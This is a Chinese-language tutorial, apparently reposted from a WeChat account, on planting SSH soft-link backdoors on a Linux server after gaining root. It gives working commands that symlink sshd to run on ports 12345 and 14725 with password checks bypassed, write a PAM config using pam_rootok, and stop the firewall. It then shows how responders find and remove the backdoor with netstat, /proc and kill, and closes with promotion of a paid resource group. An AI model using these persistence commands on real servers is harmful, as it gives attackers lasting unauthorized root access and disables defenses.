一、本教程作用

1、用在攻击的途径上
2、应急响应过程中，黑客会留后门，如果你连这种留后门方法都不会，怎么去应急？
不知攻，焉知防

二、SSH软链接后门-教程

前提条件： 假设在攻击的过程中通过利用各种getshell，已经拿到目标服务器root权限
环境： 一台开启ssh的任意Linux服务器就可以（我用的虚拟机）

在目标服务器上执行命令：

1、第一种：创建root账户 ssh软链接后门命令：

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345 #ssh软链接systemctl stop firewalld.service #关闭服务器的防火墙，不然连接不上

连接软链接后门测试：
此处密码可以随意

ssh root@XXX.XXX.XXX.XXX -p 12345

2、第二种：创建其它账户 ssh软连接后门命令
前提： 服务器存在普通账户wxg

第一步执行以下命令：echo "  #%PAM-1.0 auth       sufficient   pam_rootok.so auth       include      system-auth account    include      system-auth password   include      system-auth session    include      system-auth " >> /etc/pam.d/wxg第二步执行开启软链接命令ln -sf /usr/sbin/sshd /tmp/wxg;/tmp/wxg -oPort=14725systemctl stop firewalld.service #关闭服务器的防火墙，不然连接不上

kali远程连接wxg账户测试成功

三、SSH软链接后门——应急响应发现

第一步：查看服务器开放的端口号

netstat -anpt

发现开启有12345、14725异常端口，且名字为su、wxg，且su的PID 为7702

查看PID 7702所使用的程序为ssh

ll /proc/7702

第二步：确定软链接后门文件

查看所有的su文件，以及查找具体哪一个su是软链接后门

find -name sull /usr/share/bash-completion/completions/sull /usr/local/su

最终确定软链接为：/usr/local/su

第三步：删除软链接后门

rm -rf   /usr/local/sukill -9 7702

切记： 不要用 rm -rf /usr/local/su/，如果后面多一个斜杠，就会把文件删除！

软链接被成功清除，登录不上了

更多资源：
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程

收集整理在知识星球，可加入知识星球进行查看。也可搜索关注微信公众号：W小哥

原文始发于微信公众号（W小哥）：LINUX留后门--教程（二）—— SSH软链接后门